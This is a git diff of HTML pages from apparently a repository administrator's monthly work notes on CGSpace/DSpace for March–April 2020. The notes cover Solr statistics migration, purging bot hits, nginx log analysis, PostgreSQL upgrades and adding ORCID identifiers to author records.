    • But I have not run it on CGSpace yet because we want to ask Peter if he is sure about it…
    • Send a message to Macaroni Bros to ask them about their Drupal module and its readiness for DSpace 6 UUIDs
    • @@ -179,16 +179,16 @@ $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
    $ ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o /tmp/statistics-2010.json -k uid
     $ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2010.json -k uid
    -$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2010*</query></delete>"
    +$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2010*</query></delete>"
     $ ./run.sh -s http://localhost:8081/solr/statistics-2011 -a export -o /tmp/statistics-2011.json -k uid
     $ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2011.json -k uid
    -$ curl -s "http://localhost:8081/solr/statistics-2011/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2011*</query></delete>"
    +$ curl -s "http://localhost:8081/solr/statistics-2011/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2011*</query></delete>"
     $ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2012.json -k uid
    -$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2012*&rows=0&wt=json&indent=true' | grep numFound
    -  "response":{"numFound":3761989,"start":0,"docs":[]
    -$ curl -s 'http://localhost:8081/solr/statistics-2012/select?q=time:2012*&rows=0&wt=json&indent=true' | grep numFound
    -  "response":{"numFound":3761989,"start":0,"docs":[]
    -$ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2012*</query></delete>"
    +$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2012*&rows=0&wt=json&indent=true' | grep numFound
    +  "response":{"numFound":3761989,"start":0,"docs":[]
    +$ curl -s 'http://localhost:8081/solr/statistics-2012/select?q=time:2012*&rows=0&wt=json&indent=true' | grep numFound
    +  "response":{"numFound":3761989,"start":0,"docs":[]
    +$ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2012*</query></delete>"
     
    • I will do this for as many cores as I can (disk space limited) and then monitor the effect on the system and JVM memory usage
        @@ -196,7 +196,7 @@ $ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=tru
    -
    $ ./run.sh -s http://localhost:8081/solr/statistics-2014 -a export -o /tmp/statistics-2014-1.json -k uid -f 'time:/2014-0[1-6].*/'
    +
    $ ./run.sh -s http://localhost:8081/solr/statistics-2014 -a export -o /tmp/statistics-2014-1.json -k uid -f 'time:/2014-0[1-6].*/'
     
    • Upgrade PostgreSQL from 9.6 to 10 on DSpace Test (linode19)
        @@ -213,7 +213,7 @@ $ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=tru # pg_dropcluster 10 main # pg_upgradecluster 9.6 main # pg_dropcluster 9.6 main -# dpkg -l | grep postgresql | grep 9.6 | awk '{print $2}' | xargs dpkg -r +# dpkg -l | grep postgresql | grep 9.6 | awk '{print $2}' | xargs dpkg -r

    2020-03-09

    • Peter noticed that the Solr stats were not showing anything before 2020 @@ -250,7 +250,7 @@ $ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=tru
    • In Solr the IP is 127.0.0.1, but in the nginx logs I can luckily see the real IP (64.225.40.66), which is on Digital Ocean
    • I will purge them from Solr statistics:
    -
    $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)"</query></delete>'
    +
    $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)"</query></delete>'
     
    • Another user agent that seems to be a bot is:
    @@ -258,14 +258,14 @@ $ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=tru
    • In Solr the IP is 127.0.0.1 because of the misconfiguration, but in nginx’s logs I see it belongs to three IPs on Online.net in France:
    -
    # zcat /var/log/nginx/access.log.*.gz /var/log/nginx/rest.log.*.gz | grep 'Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)' | awk '{print $1}' | sort | uniq -c
    +
    # zcat /var/log/nginx/access.log.*.gz /var/log/nginx/rest.log.*.gz | grep 'Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)' | awk '{print $1}' | sort | uniq -c
       63090 163.172.68.99
      183428 163.172.70.248
      147608 163.172.71.24
     
    • It is making 10,000 to 40,000 requests to XMLUI per day…
    -
    # zgrep -c 'Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)' /var/log/nginx/access.log.{1..9}
    +
    # zgrep -c 'Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)' /var/log/nginx/access.log.{1..9}
     /var/log/nginx/access.log.30.gz:18687
     /var/log/nginx/access.log.31.gz:28936
     /var/log/nginx/access.log.32.gz:36402
    @@ -284,7 +284,7 @@ $ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=tru
     
    • I will purge those hits too!
    -
    $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)"</query></delete>'
    +
    $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)"</query></delete>'
     
    • Shit, and something happened and a few thousand hits from user agents with “Bot” in their user agent got through
        @@ -348,7 +348,7 @@ Purging 62 hits from [Ss]pider in statistics
      dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2020-03-12-affiliations.csv WITH CSV HEADER;`
       dspace=# \q
      -$ csvcut -l -c 0 /tmp/2020-03-12-affiliations.csv | sed -e 's/^line_number/id/' -e 's/text_value/name/' > /tmp/affiliations.csv
      +$ csvcut -l -c 0 /tmp/2020-03-12-affiliations.csv | sed -e 's/^line_number/id/' -e 's/text_value/name/' > /tmp/affiliations.csv
       $ lein run /tmp/affiliations.csv name id
       
      • I always forget how to copy the reconciled values in OpenRefine, but you need to make a new column and populate it using this GREL: if(cell.recon.matched, cell.recon.match.name, value)
      • @@ -417,7 +417,7 @@ $ lein run /tmp/affiliations.csv name id
      • Update Tomcat to version 7.0.103 in the Ansible infrastrcutrue playbooks and deploy on DSpace Test (linode26)
      • Maria sent me a few new ORCID identifiers from Bioversity so I combined them with our existing ones, filtered the unique ones, and then resolved their names using my resolve-orcids.py script:
      -
      $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcids | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2020-03-26-combined-orcids.txt
      +
      $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcids | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2020-03-26-combined-orcids.txt
       $ ./resolve-orcids.py -i /tmp/2020-03-26-combined-orcids.txt -o /tmp/2020-03-26-combined-names.txt -d
       # sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
       $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
      @@ -425,16 +425,16 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
       
    • I checked the database for likely matches to the author name and then created a CSV with the author names and ORCID iDs:
    dc.contributor.author,cg.creator.id
    -"King, Brian","Brian King: 0000-0002-7056-9214"
    -"Ortiz-Crespo, Berta","Berta Ortiz-Crespo: 0000-0002-6664-0815"
    -"Ekesa, Beatrice","Beatrice Ekesa: 0000-0002-2630-258X"
    -"Ekesa, B.","Beatrice Ekesa: 0000-0002-2630-258X"
    -"Ekesa, B.N.","Beatrice Ekesa: 0000-0002-2630-258X"
    -"Gullotta, G.","Gaia Gullotta: 0000-0002-2240-3869"
    +"King, Brian","Brian King: 0000-0002-7056-9214"
    +"Ortiz-Crespo, Berta","Berta Ortiz-Crespo: 0000-0002-6664-0815"
    +"Ekesa, Beatrice","Beatrice Ekesa: 0000-0002-2630-258X"
    +"Ekesa, B.","Beatrice Ekesa: 0000-0002-2630-258X"
    +"Ekesa, B.N.","Beatrice Ekesa: 0000-0002-2630-258X"
    +"Gullotta, G.","Gaia Gullotta: 0000-0002-2240-3869"
     
    • Running the add-orcid-identifiers-csv.py script I added 32 ORCID iDs to items on CGSpace!
    -
    $ ./add-orcid-identifiers-csv.py -i /tmp/2020-03-26-ciat-orcids.csv -db dspace -u dspace -p 'fuuu'
    +
    $ ./add-orcid-identifiers-csv.py -i /tmp/2020-03-26-ciat-orcids.csv -db dspace -u dspace -p 'fuuu'
     
    • Udana from IWMI asked about some items that are missing Altmetric donuts on CGSpace
        @@ -447,13 +447,13 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i

      2020-03-29

        -
      • Add two more Bioversity ORCID iDs to CGSpace and then tag ~70 of the authors' existing publications in the database using this CSV with my add-orcid-identifiers-csv.py script:
      • +
      • Add two more Bioversity ORCID iDs to CGSpace and then tag ~70 of the authors’ existing publications in the database using this CSV with my add-orcid-identifiers-csv.py script:
      dc.contributor.author,cg.creator.id
      -"Snook, L.K.","Laura Snook: 0000-0002-9168-1301"
      -"Snook, L.","Laura Snook: 0000-0002-9168-1301"
      -"Zheng, S.J.","Sijun Zheng: 0000-0003-1550-3738"
      -"Zheng, S.","Sijun Zheng: 0000-0003-1550-3738"
      +"Snook, L.K.","Laura Snook: 0000-0002-9168-1301"
      +"Snook, L.","Laura Snook: 0000-0002-9168-1301"
      +"Zheng, S.J.","Sijun Zheng: 0000-0003-1550-3738"
      +"Zheng, S.","Sijun Zheng: 0000-0003-1550-3738"
       
      • Deploy latest Bioversity and CIAT updates on CGSpace (linode18) and DSpace Test (linode26)
      • Deploy latest Ansible infrastructure playbooks on CGSpace and DSpace Test to get the latest dspace-statistics-api (v1.1.1) and Tomcat (7.0.103) versions
      • diff --git a/docs/2020-04/index.html b/docs/2020-04/index.html index db6a7574d..bdd2eb88b 100644 --- a/docs/2020-04/index.html +++ b/docs/2020-04/index.html @@ -48,7 +48,7 @@ The third item now has a donut with score 1 since I tweeted it last week On the same note, the one item Abenet pointed out last week now has a donut with score of 104 after I tweeted it last week "/> - + @@ -171,14 +171,14 @@ On the same note, the one item Abenet pointed out last week now has a donut with
    -
    $ psql -h localhost -U postgres dspace -c "DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value LIKE '%Ballantyne%';"
    +
    $ psql -h localhost -U postgres dspace -c "DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value LIKE '%Ballantyne%';"
     DELETE 97
    -$ ./add-orcid-identifiers-csv.py -i 2020-04-07-peter-orcids.csv -db dspace -u dspace -p 'fuuu' -d
    +$ ./add-orcid-identifiers-csv.py -i 2020-04-07-peter-orcids.csv -db dspace -u dspace -p 'fuuu' -d
     
    • I used this CSV with the script (all records with his name have the name standardized like this):
    dc.contributor.author,cg.creator.id
    -"Ballantyne, Peter G.","Peter G. Ballantyne: 0000-0001-9346-2893"
    +"Ballantyne, Peter G.","Peter G. Ballantyne: 0000-0001-9346-2893"
     
    • Then I tried another way, to identify all duplicate ORCID identifiers for a given resource ID and group them so I can see if count is greater than 1:
    @@ -188,31 +188,31 @@ COPY 15209
  • Of those, about nine authors had duplicate ORCID identifiers over about thirty records, so I created a CSV with all their name variations and ORCID identifiers:
  • dc.contributor.author,cg.creator.id
    -"Ballantyne, Peter G.","Peter G. Ballantyne: 0000-0001-9346-2893"
    -"Ramirez-Villegas, Julian","Julian Ramirez-Villegas: 0000-0002-8044-583X"
    -"Villegas-Ramirez, J","Julian Ramirez-Villegas: 0000-0002-8044-583X"
    -"Ishitani, Manabu","Manabu Ishitani: 0000-0002-6950-4018"
    -"Manabu, Ishitani","Manabu Ishitani: 0000-0002-6950-4018"
    -"Ishitani, M.","Manabu Ishitani: 0000-0002-6950-4018"
    -"Ishitani, M.","Manabu Ishitani: 0000-0002-6950-4018"
    -"Buruchara, Robin A.","Robin Buruchara: 0000-0003-0934-1218"
    -"Buruchara, Robin","Robin Buruchara: 0000-0003-0934-1218"
    -"Jarvis, Andy","Andy Jarvis: 0000-0001-6543-0798"
    -"Jarvis, Andrew","Andy Jarvis: 0000-0001-6543-0798"
    -"Jarvis, A.","Andy Jarvis: 0000-0001-6543-0798"
    -"Tohme, Joseph M.","Joe Tohme: 0000-0003-2765-7101"
    -"Hansen, James","James Hansen: 0000-0002-8599-7895"
    -"Hansen, James W.","James Hansen: 0000-0002-8599-7895"
    -"Asseng, Senthold","Senthold Asseng: 0000-0002-7583-3811"
    +"Ballantyne, Peter G.","Peter G. Ballantyne: 0000-0001-9346-2893"
    +"Ramirez-Villegas, Julian","Julian Ramirez-Villegas: 0000-0002-8044-583X"
    +"Villegas-Ramirez, J","Julian Ramirez-Villegas: 0000-0002-8044-583X"
    +"Ishitani, Manabu","Manabu Ishitani: 0000-0002-6950-4018"
    +"Manabu, Ishitani","Manabu Ishitani: 0000-0002-6950-4018"
    +"Ishitani, M.","Manabu Ishitani: 0000-0002-6950-4018"
    +"Ishitani, M.","Manabu Ishitani: 0000-0002-6950-4018"
    +"Buruchara, Robin A.","Robin Buruchara: 0000-0003-0934-1218"
    +"Buruchara, Robin","Robin Buruchara: 0000-0003-0934-1218"
    +"Jarvis, Andy","Andy Jarvis: 0000-0001-6543-0798"
    +"Jarvis, Andrew","Andy Jarvis: 0000-0001-6543-0798"
    +"Jarvis, A.","Andy Jarvis: 0000-0001-6543-0798"
    +"Tohme, Joseph M.","Joe Tohme: 0000-0003-2765-7101"
    +"Hansen, James","James Hansen: 0000-0002-8599-7895"
    +"Hansen, James W.","James Hansen: 0000-0002-8599-7895"
    +"Asseng, Senthold","Senthold Asseng: 0000-0002-7583-3811"
     
    • Then I deleted all their existing ORCID identifier records:
    -
    dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value SIMILAR TO '%(0000-0001-6543-0798|0000-0001-9346-2893|0000-0002-6950-4018|0000-0002-7583-3811|0000-0002-8044-583X|0000-0002-8599-7895|0000-0003-0934-1218|0000-0003-2765-7101)%';
    +
    dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240 AND text_value SIMILAR TO '%(0000-0001-6543-0798|0000-0001-9346-2893|0000-0002-6950-4018|0000-0002-7583-3811|0000-0002-8044-583X|0000-0002-8599-7895|0000-0003-0934-1218|0000-0003-2765-7101)%';
     DELETE 994
     
    • And then I added them again using the add-orcid-identifiers records:
    -
    $ ./add-orcid-identifiers-csv.py -i 2020-04-07-fix-duplicate-orcids.csv -db dspace -u dspace -p 'fuuu' -d
    +
    $ ./add-orcid-identifiers-csv.py -i 2020-04-07-fix-duplicate-orcids.csv -db dspace -u dspace -p 'fuuu' -d
     
    • I ran the fixes on DSpace Test and CGSpace as well
    • I started testing the pull request sent by Atmire yesterday @@ -230,7 +230,7 @@ DELETE 994
    -
    dspace63=# DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');
    +
    dspace63=# DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');
     dspace63=# CREATE EXTENSION pgcrypto;
     
    • Then DSpace 6.3 started up OK and I was able to see some statistics in the Content and Usage Analysis (CUA) module, but not on community, collection, or item pages @@ -243,7 +243,7 @@ dspace63=# CREATE EXTENSION pgcrypto;
    • And I remembered I actually need to run the DSpace 6.4 Solr UUID migrations:
    -
    $ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
    +
    $ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
     $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
     
    • Run system updates on DSpace Test (linode26) and reboot it
    • @@ -258,7 +258,7 @@ $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
    • I realized that solr-upgrade-statistics-6x only processes 100,000 records by default so I think we actually need to finish running it for all legacy Solr records before asking Atmire why CUA statlets and detailed statistics aren’t working
    • For now I am just doing 250,000 records at a time on my local environment:
    -
    $ export JAVA_OPTS="-Xmx2000m -Dfile.encoding=UTF-8"
    +
    $ export JAVA_OPTS="-Xmx2000m -Dfile.encoding=UTF-8"
     $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x -n 250000
     
    • Despite running the migration for all of my local 1.5 million Solr records, I still see a few hundred thousand like -1 and 0-unmigrated @@ -284,7 +284,7 @@ $ podman start artifactory
      • A few days ago Peter asked me to update an author’s name on CGSpace and in the controlled vocabularies:
      -
      dspace=# UPDATE metadatavalue SET text_value='Knight-Jones, Theodore J.D.' WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value='Knight-Jones, T.J.D.';
      +
      dspace=# UPDATE metadatavalue SET text_value='Knight-Jones, Theodore J.D.' WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value='Knight-Jones, T.J.D.';
       
      • I updated his existing records on CGSpace, changed the controlled lists, added his ORCID identifier to the controlled list, and tagged his thirty-nine items with the ORCID iD
      • The new DSpace 6 stuff that Atmire sent modifies the Mirage 2’s pom.xml to copy the each theme’s resulting node_modules to each theme after building and installing with ant update because they moved some packages from bower to npm and now reference them in page-structure.xsl @@ -315,7 +315,7 @@ $ podman start artifactory
        • Looking into a high rate of outgoing bandwidth from yesterday on CGSpace (linode18):
        -
        # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "19/Apr/2020:0[6789]" | goaccess --log-format=COMBINED -
        +
        # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "19/Apr/2020:0[6789]" | goaccess --log-format=COMBINED -
         
        • One host in Russia (91.241.19.70) download 23GiB over those few hours in the morning
            @@ -325,7 +325,7 @@ $ podman start artifactory
          # grep -c 91.241.19.70 /var/log/nginx/access.log.1
           8900
          -# grep 91.241.19.70 /var/log/nginx/access.log.1 | grep -c '10568/35187'
          +# grep 91.241.19.70 /var/log/nginx/access.log.1 | grep -c '10568/35187'
           8900
           
          • I thought the host might have been Yandex misbehaving, but its user agent is:
          • @@ -343,20 +343,20 @@ Total number of bot hits purged: 8909
        • While investigating that I noticed ORCID identifiers missing from a few authors names, so I added them with my add-orcid-identifiers.py script:
        -
        $ ./add-orcid-identifiers-csv.py -i 2020-04-20-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
        +
        $ ./add-orcid-identifiers-csv.py -i 2020-04-20-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
         
        • The contents of 2020-04-20-add-orcids.csv was:
        dc.contributor.author,cg.creator.id
        -"Schut, Marc","Marc Schut: 0000-0002-3361-4581"
        -"Schut, M.","Marc Schut: 0000-0002-3361-4581"
        -"Kamau, G.","Geoffrey Kamau: 0000-0002-6995-4801"
        -"Kamau, G","Geoffrey Kamau: 0000-0002-6995-4801"
        -"Triomphe, Bernard","Bernard Triomphe: 0000-0001-6657-3002"
        -"Waters-Bayer, Ann","Ann Waters-Bayer: 0000-0003-1887-7903"
        -"Klerkx, Laurens","Laurens Klerkx: 0000-0002-1664-886X"
        +"Schut, Marc","Marc Schut: 0000-0002-3361-4581"
        +"Schut, M.","Marc Schut: 0000-0002-3361-4581"
        +"Kamau, G.","Geoffrey Kamau: 0000-0002-6995-4801"
        +"Kamau, G","Geoffrey Kamau: 0000-0002-6995-4801"
        +"Triomphe, Bernard","Bernard Triomphe: 0000-0001-6657-3002"
        +"Waters-Bayer, Ann","Ann Waters-Bayer: 0000-0003-1887-7903"
        +"Klerkx, Laurens","Laurens Klerkx: 0000-0002-1664-886X"
         
          -
        • I confirmed some of the authors' names from the report itself, then by looking at their profiles on ORCID.org
        • +
        • I confirmed some of the authors’ names from the report itself, then by looking at their profiles on ORCID.org
        • Add new ILRI subject “COVID19” to the 5_x-prod branch
        • Add new CCAFS Phase II project tags to the 5_x-prod branch
        • I will deploy these to CGSpace in the next few days
        • @@ -387,17 +387,17 @@ Total number of bot hits purged: 8909
      -
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
      +
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
       $ time chrt -i 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
       
      • I ran the dspace cleanup -v process on CGSpace and got an error:
      -
      Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
      -  Detail: Key (bitstream_id)=(184980) is still referenced from table "bundle".
      +
      Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
      +  Detail: Key (bitstream_id)=(184980) is still referenced from table "bundle".
       
      • The solution is, as always:
      -
      $ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);'
      +
      $ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);'
       UPDATE 1
       
      • I spent some time working on the XMLUI themes in DSpace 6 @@ -413,7 +413,7 @@ UPDATE 1
      .breadcrumb > li + li:before {
      -  content: "/\00a0";
      +  content: "/\00a0";
       }
       

      2020-04-27

        @@ -421,9 +421,9 @@ UPDATE 1
      • My changes to DSpace XMLUI Mirage 2 build process mean that we don’t need Ruby gems at all anymore! We can completely build without them!
      • Trying to test the com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI script but there is an error:
      -
      Exception: org.apache.solr.search.SyntaxError: Cannot parse 'cua_version:${cua.version.number}': Encountered " "}" "} "" at line 1, column 32.
      +
      Exception: org.apache.solr.search.SyntaxError: Cannot parse 'cua_version:${cua.version.number}': Encountered " "}" "} "" at line 1, column 32.
       Was expecting one of:
      -    "TO" ...
      +    "TO" ...
           <RANGE_QUOTED> ...
           <RANGE_GOOP> ...
       
        @@ -473,7 +473,7 @@ atmire-cua.version.number=${cua.version.number}
    -
    Record uid: ee085cc0-0110-42c5-80b9-0fad4015ed9f couldn't be processed
    +
    Record uid: ee085cc0-0110-42c5-80b9-0fad4015ed9f couldn't be processed
     com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: ee085cc0-0110-42c5-80b9-0fad4015ed9f, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
             at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(AtomicStatisticsUpdater.java:304)
             at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(AtomicStatisticsUpdater.java:176)
    @@ -508,7 +508,7 @@ Caused by: java.lang.NullPointerException
     
     
     
    -
    $ grep ERROR dspace.log.2020-04-29 | cut -f 3- -d' ' | sort | uniq -c | sort -n
    +
    $ grep ERROR dspace.log.2020-04-29 | cut -f 3- -d' ' | sort | uniq -c | sort -n
           1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL findByUnique Error -
           1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL find Error -
           1 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL query singleTable Error -
    @@ -524,25 +524,25 @@ Caused by: java.lang.NullPointerException
     
    • Database connections do seem high:
    -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
           5 dspaceApi
           6 dspaceCli
          88 dspaceWeb
     
    • Most of those are idle in transaction:
    -
    $ psql -c 'select * from pg_stat_activity' | grep 'dspaceWeb' | grep -c "idle in transaction"
    +
    $ psql -c 'select * from pg_stat_activity' | grep 'dspaceWeb' | grep -c "idle in transaction"
     67
     
    • I don’t see anything in the PostgreSQL or Tomcat logs suggesting anything is wrong… I think the solution to clear these idle connections is probably to just restart Tomcat
    • I looked at the Solr stats for this month and see lots of suspicious IPs:
    -
    $ curl -s 'http://localhost:8081/solr/statistics/select?q=*:*&fq=dateYearMonth:2020-04&rows=0&wt=json&indent=true&facet=true&facet.field=ip
    +
    $ curl -s 'http://localhost:8081/solr/statistics/select?q=*:*&fq=dateYearMonth:2020-04&rows=0&wt=json&indent=true&facet=true&facet.field=ip
     
    -        "88.99.115.53",23621, # Hetzner, using XMLUI and REST API with no user agent
    -        "104.154.216.0",11865,# Google cloud, scraping XMLUI with no user agent
    -        "104.198.96.245",4925,# Google cloud, using REST API with no user agent
    -        "52.34.238.26",2907,  # EcoSearch on XMLUI, user agent: EcoSearch (+https://search.ecointernet.org/)
    +        "88.99.115.53",23621, # Hetzner, using XMLUI and REST API with no user agent
    +        "104.154.216.0",11865,# Google cloud, scraping XMLUI with no user agent
    +        "104.198.96.245",4925,# Google cloud, using REST API with no user agent
    +        "52.34.238.26",2907,  # EcoSearch on XMLUI, user agent: EcoSearch (+https://search.ecointernet.org/)
     
    • And a bunch more… ugh…
        @@ -561,10 +561,10 @@ $ ./check-spider-ip-hits.sh -f /tmp/ips -s statistics -p
      • Then I added a few of them to the bot mapping in the nginx config because it appears they are regular harvesters since 2018
      • Looking through the Solr stats faceted by the userAgent field I see some interesting ones:
      -
      $ curl 'http://localhost:8081/solr/statistics/select?q=*%3A*&rows=0&wt=json&indent=true&facet=true&facet.field=userAgent'
      +
      $ curl 'http://localhost:8081/solr/statistics/select?q=*%3A*&rows=0&wt=json&indent=true&facet=true&facet.field=userAgent'
       ...
      -"Delphi 2009",50725,
      -"OgScrper/1.0.0",12421,
      +"Delphi 2009",50725,
      +"OgScrper/1.0.0",12421,
       
      • Delphi is only used by IP addresses in Greece, so that’s obviously the GARDIAN people harvesting us…
      • I have no idea what OgScrper is, but it’s not a user!
      • @@ -586,11 +586,11 @@ $ ./check-spider-hits.sh -f /tmp/agents -s statistics -p
      • That’s about 300,000 hits purged…
      • Then remove the ones with spaces manually, checking the query syntax first, then deleting in yearly cores and the statistics core:
      -
      $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=userAgent:/Delphi 2009/&rows=0"
      +
      $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=userAgent:/Delphi 2009/&rows=0"
       ...
      -<lst name="responseHeader"><int name="status">0</int><int name="QTime">52</int><lst name="params"><str name="q">userAgent:/Delphi 2009/</str><str name="rows">0</str></lst></lst><result name="response" numFound="38760" start="0"></result>
      -$ for year in {2010..2019}; do curl -s "http://localhost:8081/solr/statistics-$year/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Delphi 2009"</query></delete>'; done
      -$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Delphi 2009"</query></delete>'
      +<lst name="responseHeader"><int name="status">0</int><int name="QTime">52</int><lst name="params"><str name="q">userAgent:/Delphi 2009/</str><str name="rows">0</str></lst></lst><result name="response" numFound="38760" start="0"></result>
      +$ for year in {2010..2019}; do curl -s "http://localhost:8081/solr/statistics-$year/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Delphi 2009"</query></delete>'; done
      +$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Delphi 2009"</query></delete>'
       
      • Quoting them works for now until I can look into it and handle it properly in the script
      • This was about 400,000 hits in total purged from the Solr statistics
      • @@ -607,7 +607,7 @@ $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true&quo
      # mv /etc/letsencrypt /etc/letsencrypt.bak
      -# /opt/certbot-auto certonly --standalone --email fu@m.com -d dspacetest.cgiar.org --standalone --pre-hook "/bin/systemctl stop nginx" --post-hook "/bin/systemctl start nginx"
      +# /opt/certbot-auto certonly --standalone --email fu@m.com -d dspacetest.cgiar.org --standalone --pre-hook "/bin/systemctl stop nginx" --post-hook "/bin/systemctl start nginx"
       # /opt/certbot-auto revoke --cert-path /etc/letsencrypt.bak/live/dspacetest.cgiar.org/cert.pem
       # rm -rf /etc/letsencrypt.bak
       
        @@ -618,11 +618,11 @@ $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true&quo
        • But I don’t see a lot of connections in PostgreSQL itself:
        -
        $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
        +
        $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
               5 dspaceApi
               6 dspaceCli
              14 dspaceWeb
        -$ psql -c 'select * from pg_stat_activity' | wc -l
